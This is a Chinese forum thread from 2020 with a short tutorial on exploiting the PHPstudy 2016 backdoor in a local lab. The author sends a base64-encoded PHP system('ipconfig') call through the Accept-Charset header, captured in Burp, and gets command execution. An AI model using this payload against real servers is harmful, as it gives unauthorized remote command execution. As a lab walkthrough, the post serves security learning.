搜索
查看: 8284|回复: 1

浅谈PHPstudy后门利用

    [复制链接]

330

主题

177

回帖

1071

积分

vip用户

积分
1071

注册会员活跃会员热心会员

QQ
发表于 2020-5-5 20:04:53 | 显示全部楼层 |阅读模式
[md]### 环境说明:

* kali Linux
* phpstudy(2016)
* php5.4+apache

### burp 抓包
访问http://localhost/index.php在burp中抓包
**需要注意的是,后面一定要跟`xxx.php`**
![999.png](data/attachment/forum/202005/05/195613cdilaxczja6tap6a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "999.png")

右键 `send to sequencer`
![99999999.png](data/attachment/forum/202005/05/195852ok9br77hhw8qkjy9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "99999999.png")
`Accept-Charset`后跟base64编码的系统命令:
如:
```
Accept-Charset:system('ipconfig');  #编码前
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==   #编码后
```
![yyyy.png](data/attachment/forum/202005/05/200415trmszv2pmssv9zkk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "yyyy.png")
[/md]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
有没有参加CTF比赛的,一起组队啊!
回复

使用道具 举报

2

主题

7

回帖

15

积分

新手开车

积分
15
发表于 2020-5-5 21:38:45 来自手机 | 显示全部楼层 来自 甘肃
试了好几次都没有成功,过会儿在试一下!e6k
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表